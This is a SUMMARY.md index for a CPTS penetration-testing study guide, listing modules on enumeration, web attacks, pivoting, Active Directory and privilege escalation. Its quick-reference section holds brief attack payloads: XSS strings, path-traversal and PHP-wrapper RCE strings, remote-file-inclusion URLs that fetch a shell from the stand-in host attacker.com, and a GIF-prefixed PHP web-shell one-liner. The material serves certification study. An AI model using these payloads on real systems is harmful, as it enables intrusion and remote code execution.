SUMMARY.md

Summary

🎯 CPTS Preparation Guide

• 📚 Introduction

📋 Information Gathering

🌐 Infrastructure Enumeration

• 🔍 Footprinting

🛡️ Network Security

• 🔥 Firewall & IDS/IPS Evasion

🎯 Assessment Methodologies

• 📊 Vulnerability Assessment

🕷️ Web Application Information Gathering

• 🌐 Subdomain Enumeration & DNS Discovery
• 🔧 Web Application Enumeration
• 📋 Web Information Gathering Overview

🌐 Web Application Attacks

• 🔥 Cross-Site Scripting (XSS)
• 🌐 Web Attacks
  • HTTP Verb Tampering
  • Insecure Direct Object References (IDOR)
  • XML External Entity (XXE) Injection
  • 🎯 Skills Assessment
• 📁 File Inclusion
  • Basic LFI Techniques
  • Advanced Bypasses & PHP Filters
  • PHP Wrappers for RCE
  • Remote File Inclusion (RFI)
  • File Upload + LFI
  • Log Poisoning Techniques
  • Automated Scanning & Tools
  • Prevention & Hardening
  • Skills Assessment Walkthrough
• 📤 File Upload Attacks
  • Upload Exploitation
  • Client-Side Validation
  • Blacklist Filters
  • Basic Bypass Techniques
  • Type Filters
  • Limited File Uploads
  • Prevention & Defenses
  • 🎯 Skills Assessment
• ⚡ Command Injection
  • Detection Methods
  • Basic Exploitation
  • Advanced Operators
  • Filter Identification
  • Bypassing Space Filters
  • Bypassing Character Filters
  • Bypassing Blacklisted Commands
  • Advanced Command Obfuscation
  • Evasion Tools
  • 🎯 Skills Assessment
• 🌐 Web Attacks
  • HTTP Verb Tampering
  • Insecure Direct Object References (IDOR)
  • XML External Entity (XXE) Injection
  • 🎯 Skills Assessment

🗄️ Database Services

• 🔍 MySQL Enumeration
• 🏢 MSSQL Enumeration
• ⚡ Oracle TNS Enumeration

📁 Network Services

• 📂 FTP Enumeration
• 🔗 SMB Enumeration
• 📁 NFS Enumeration
• 📧 SMTP Enumeration
• 📮 Email Services (IMAP/POP3)
• 📊 SNMP Enumeration
• ⚙️ IPMI Enumeration

⚔️ Attacking Common Services

• 📁 FTP Attacks
• 🔗 SMB Attacks
• 🗄️ SQL Database Attacks
• 🌐 DNS Attacks
• 🖥️ RDP Attacks
• 📧 Email Services Attacks (SMTP/IMAP/POP3)
• 🎯 Skills Assessment - Complete Attack Chain Scenarios

🌐 Attacking Common Applications

• 📋 Module Overview

🌐 Content Management Systems (CMS)

• WordPress Discovery & Enumeration
• WordPress Attacks & Exploitation
• Joomla Discovery & Enumeration
• Joomla Attacks & Exploitation
• Drupal Discovery & Enumeration
• Drupal Attacks & Exploitation

⚙️ Development & Build Tools

• Tomcat Discovery & Enumeration
• Tomcat Attacks & Exploitation
• Jenkins Discovery & Enumeration
• Jenkins Attacks & Exploitation

📊 Infrastructure & Monitoring

• Splunk Discovery & Enumeration
• Splunk Attacks & Exploitation
• GitLab Discovery & Enumeration
• PRTG Network Monitor Attacks

🎫 Customer Service & Management

• osTicket System Exploitation

🔌 Web Interfaces & Gateways

• Common Gateway Interface (CGI) - Shellshock
• IIS Tilde Enumeration
• ColdFusion Discovery & Enumeration

🔍 Specialized Applications

• LDAP Injection Attacks
• Binary Reverse Engineering
• Other Notable Applications

🔀 Pivoting, Tunneling & Port Forwarding

• 📋 Module Overview
• 🔧 SSH Tunneling Complete Guide
• 🌐 Dynamic Port Forwarding
• 🔄 Remote Port Forwarding
• ⚡ Chisel SOCKS5 Tunneling
• 🛡️ SSHuttle Pivoting
• 🎯 Meterpreter Tunneling
• 🔗 Socat Redirection
• 🪟 Plink Windows Pivoting
• ⚙️ Netsh Port Forwarding
• 🔌 SocksOverRDP
• 🕸️ Rpivot Web Pivoting
• �� DNS Tunneling with dnscat2
• 📡 ICMP Tunneling with ptunnel-ng
• �� Complete Skills Assessment

🏰 Active Directory Enumeration & Attacks

• 🔍 Initial Domain Enumeration
• ☣️ LLMNR/NBT-NS Poisoning from Linux
• 🪟 LLMNR/NBT-NS Poisoning from Windows
• 🔐 Password Policy Enumeration
• 👥 Password Spraying - Target User Lists
• 🐧 Password Spraying from Linux
• 🪟 Password Spraying from Windows
• 🛡️ Security Controls Enumeration
• 🐧 Credentialed Enumeration from Linux
• 🪟 Credentialed Enumeration from Windows
• 🏴‍☠️ Living Off the Land
• 🎫 Kerberoasting from Linux
• 🎫 Kerberoasting from Windows
• 🔑 ACL Enumeration
• 🎯 ACL Abuse Tactics
• 💎 DCSync Attack
• 🔐 Privileged Access
• 🎭 Kerberos "Double Hop" Problem
• ⚡ Bleeding Edge Vulnerabilities
• 🔧 Miscellaneous Misconfigurations
• 🔗 Domain Trusts Primer
• ⬆️ Child → Parent Trust Attacks
• 🐧 Child → Parent Trust Attacks - from Linux
• 🌲 Cross-Forest Trust Abuse - from Windows
• 🐧 Cross-Forest Trust Abuse - from Linux
• 🎯 Skills Assessment Part I - Complete Walkthrough
• 🚀 Skills Assessment Part II - Advanced Professional Methodology

🖥️ Remote Management Protocols

• 📋 Remote Management Overview
• 🐧 Linux Remote Protocols
• 🪟 Windows Remote Protocols

🔧 Shells & Payloads

🐚 Shell Fundamentals

• 📋 Shell Basics
• 🎯 Payloads
• 🔧 Metasploit Framework
• 🚀 Meterpreter Post-Exploitation

🐧 Platform-Specific Shells

• 🪟 Windows Shells
• 🐧 Linux/Unix Shells

🌐 Web Shells

• 🕷️ PHP Web Shells
• 🔧 Web Shell Techniques

📁 File Transfer Methods

• 🪟 Windows File Transfers
• 🐧 Linux File Transfers
• 💻 Code-Based File Transfers
• 🔀 Miscellaneous File Transfers
• 🛡️ Protected File Transfers
• 🎯 Living off the Land Transfers
• 🔍 File Transfer Detection

🪟 Windows Privilege Escalation

• 📋 Module Overview
• 🔍 Situational Awareness
• 📊 Initial Enumeration
• 🔄 Communication with Processes
• 🥔 SeImpersonate & SeAssignPrimaryToken
• 🔍 SeDebugPrivilege
• 🏠 SeTakeOwnershipPrivilege
• 🏛️ Windows Built-in Groups
• 📋 Event Log Readers
• 🌐 DnsAdmins
• 💻 Hyper-V Administrators
• 🖨️ Print Operators
• 🖥️ Server Operators
• 🛡️ UAC Bypass
• 🔐 Weak Permissions
• 💣 Kernel Exploits
• ⚡ Vulnerable Services
• 🔑 Credential Hunting
• 📁 Other Files
• 🕵️ Further Credential Theft
• 🚪 Citrix Breakout
• 👥 Interacting with Users
• 🎯 Pillaging
• 🔧 Miscellaneous Techniques
• 🖥️ Windows Server 2008
• 💻 Windows 7 Exploitation

🐧 Linux Privilege Escalation

• 📋 Module Overview
• 🔍 Environment Enumeration
• 🔧 Services & Internals Enumeration
• 🔍 Credential Hunting
• 🛤️ PATH Abuse
• 🌟 Wildcard Abuse
• 🚪 Escaping Restricted Shells
• 🔐 Special Permissions
• ⚡ Sudo Rights Abuse
• 👑 Privileged Groups
• 🎭 Capabilities
• ⚙️ Vulnerable Services
• ⏰ Cron Job Abuse
• 🐳 LXD Container Escape
• 🐋 Docker Container Escape
• 📜 Logrotate Exploitation
• 🔧 Miscellaneous Techniques
• 📚 Shared Libraries
• 🎯 Shared Object Hijacking
• 🐍 Python Library Hijacking
• 🚨 Sudo CVE Exploits
• 🔐 Polkit/Pwnkit
• 💧 Dirty Pipe
• 🌐 Netfilter Kernel Exploits (Advanced)
• 🛡️ Linux Hardening

📋 Documentation & Reporting

• 📝 Notetaking & Organization
• 📊 Types of Reports
• 📋 Components of a Report
• 🔍 How to Write Up a Finding
• 🛠️ Reporting Tips and Tricks
• 📁 HTB Academy Example
  • [📋 Administrative Information](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/1. Administrative Information.md)
  • [🎯 Attack Path Documentation](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/11. Attack Path.md)
  • [🔐 Credentials Tracking](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/6. Credentials.md)
  • [📊 Findings Summary](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/12. Findings.md)
  • [🔴 Example High Finding - Kerberoasting](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Findings/H1 - Kerberoasting.md)
  • [🟡 Example Medium Finding - File Shares](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Findings/M1 - Insecure File Shares.md)

🌐 Attacking Enterprise Networks

• 🔍 External Information Gathering
• ⚔️ Service Enumeration & Exploitation
• 🌐 Web Enumeration & Exploitation
• 🚀 Initial Access
• 🔒 Post-Exploitation Persistence
• 🔍 Internal Information Gathering
• ⚔️ Exploitation & Privilege Escalation
• 🔄 Lateral Movement
• 👑 Active Directory Compromise
• 🏆 Post-Exploitation

🔐 Password Attacks

📋 Complete Assessment Workflows

• 🎯 Skills Assessment - Complete Password Attacks Workflow

🎯 Active Directory Attacks

• 🎫 NTDS.dit Extraction & Analysis
• 🔍 Username Enumeration & OSINT
• 🗡️ Dictionary & Brute Force Attacks
• ⚔️ Pass-the-Hash Techniques

🪟 Windows Password Attacks

• 🔧 Registry Hive Attacks (SAM, SYSTEM, SECURITY)
• 🧠 LSASS Memory Dumping
• 💾 Credential Manager Attacks
• 🕵️ Credential Hunting in Windows

🐧 Linux Password Attacks

• 🔍 Credential Hunting in Linux

🔨 Hash Cracking

• ⚡ Hashcat Techniques
• 🔓 John the Ripper
• 📝 Custom Wordlists & Rules

🌐 Network Service Attacks

• 🔌 Network Services Brute Force
• 📁 Protected File Cracking
• 🌐 Network Traffic Credential Hunting
• 📂 Network Shares Credential Hunting

⚔️ Windows Lateral Movement

• 🔑 Pass the Hash (PtH) Attacks
• 🎫 Pass the Ticket (PtT) Attacks
• 📜 Pass the Certificate (ESC8 & ADCS Attacks)
• 🐧 Pass the Ticket from Linux

---

📖 Quick Reference

🕷️ Web Application Information Gathering

• DNS Tools - dig, dnsenum, amass, puredns for subdomain discovery
• Web Enumeration - gobuster, ffuf, whatweb for content discovery
• CMS Tools - wpscan, joomscan, droopescan for specific platforms
• Parameter Discovery - arjun, paramspider, ffuf for hidden parameters

🌐 Web Application Attacks

• XSS Types - Stored (persistent), Reflected (non-persistent), DOM-based (client-side)
• XSS Tools - XSStrike, BruteXSS, Burp Suite, OWASP ZAP
• Basic Payloads - <script>alert(1)</script>, <img src=x onerror=alert(1)>
• Cookie Stealing - <script>alert(document.cookie)</script>
• LFI Techniques - Path Traversal (../../../etc/passwd), PHP Wrappers (php://filter)
• LFI Bypasses - Non-recursive (....//), URL encoding (%2e%2e%2f), Approved paths (./languages/../../../)
• PHP Filters - Source code disclosure (php://filter/read=convert.base64-encode/resource=config)
• PHP Fuzzing - ffuf -u http://target.com/FUZZ.php, common files (config.php, database.php)
• PHP Wrappers RCE - Data (data://text/plain;base64,BASE64), Input (php://input + POST), Expect (expect://id)
• RCE Requirements - allow_url_include = On (data/input), expect extension (expect wrapper)
• Remote File Inclusion (RFI) - HTTP (http://attacker.com/shell.php), FTP (ftp://attacker.com/shell.php), SMB (\\attacker.com\share\shell.php)
• RFI Servers - Python HTTP (python3 -m http.server 80), FTP (python3 -m pyftpdlib -p 21), SMB (impacket-smbserver)
• File Upload + LFI - Malicious images (GIF8<?php system($_GET["cmd"]); ?>), Zip (zip://file.jpg#shell.php), Phar (phar://file.jpg/shell.txt)
• Upload Paths - /uploads/, /profile_images/, /assets/images/, path discovery via source inspection
• Log Poisoning - Session (/var/lib/php/sessions/sess_ID), Apache (/var/log/apache2/access.log + User-Agent), SSH (/var/log/auth.log)
• Process Poisoning - /proc/self/environ, /proc/self/fd/N via User-Agent header injection
• Automated Scanning - Parameter fuzzing (ffuf + burp-parameter-names.txt), LFI wordlists (LFI-Jhaddix.txt), Server discovery
• LFI Tools - liffy, LFISuite, dotdotpwn, kadimus, custom automation scripts
• File Inclusion Module - 9 specialized guides: Basic LFI → Advanced Bypasses → PHP Wrappers → RFI → File Upload → Log Poisoning → Automated Tools → Prevention → Skills Assessment
• LFI Techniques - Path traversal, PHP filters (base64-encode), Wrapper RCE (data://, php://input, expect://)
• RFI Protocols - HTTP, FTP, SMB remote file inclusion for direct RCE
• Log Poisoning - Session, Apache, SSH, Mail, FTP log contamination for RCE
• PHP Security - disable_functions, open_basedir, allow_url_include=Off, Container isolation
• Skills Assessment - Multi-technique chain: PHP filters → Hidden admin → LFI → Log poisoning → RCE → Flag extraction

🔧 Database Enumeration

• MySQL - Port 3306, default credentials, SQL injection
• MSSQL - Port 1433, Windows authentication, xp_cmdshell
• Oracle TNS - Port 1521, SID enumeration, privilege escalation

🌐 Network Service Enumeration

• FTP - Port 21, anonymous access, file upload/download
• SMB - Ports 139/445, share enumeration, EternalBlue (CVE-2017-0144)
• NFS - Port 2049, share mounting, UID/GID manipulation
• SMTP - Port 25, user enumeration, open relay testing
• IMAP/POP3 - Ports 143/993/110/995, certificate analysis
• SNMP - Port 161, community strings, OID enumeration
• IPMI - Port 623, hash extraction, cipher zero vulnerability

🔐 Remote Access Protocols

• SSH - Port 22, key-based authentication, tunneling
• RDP - Port 3389, BlueKeep vulnerability, certificate analysis
• WinRM - Ports 5985/5986, PowerShell remoting, authentication bypass
• WMI - Port 135, remote queries, persistence mechanisms

---

🎯 HTB Academy Modules

✅ Completed

• Firewall and IDS/IPS Evasion
• Footprinting
• Host-Based Enumeration
• Web Application Information Gathering
• Attacking Common Services (Complete - 7 documents, 4,262 lines)
• Attacking Common Applications (Complete - 22 documents covering CMS, Development Tools, Infrastructure Monitoring, and Specialized Applications)
• Cross-Site Scripting (XSS) (Complete - HTB Academy guide with all XSS types and techniques)
• File Inclusion (Complete - HTB Academy module with 9 specialized guides: Basic LFI, Advanced Bypasses, PHP Wrappers RCE, RFI, File Upload + LFI, Log Poisoning, Automated Scanning, Prevention & Hardening, Skills Assessment)
• File Upload Attacks (Complete - 9 specialized guides covering all upload attack vectors and bypass techniques)
• Command Injection (Complete - 10 comprehensive sections with detection, exploitation, and advanced evasion techniques)
• Web Attacks (Complete - HTTP Verb Tampering, IDOR, XXE Injection with Skills Assessment)
• Pivoting, Tunneling & Port Forwarding (Complete - 14 specialized guides covering all tunneling protocols and techniques)
• Active Directory Enumeration & Attacks (Complete - 25 comprehensive guides covering all AD attack vectors and lateral movement)

🔄 In Progress

• Vulnerability Assessment
• Password Attacks

📅 Planned

• SQL Injection (Advanced)
• Network Enumeration
• Privilege Escalation
• Lateral Movement
• Post-Exploitation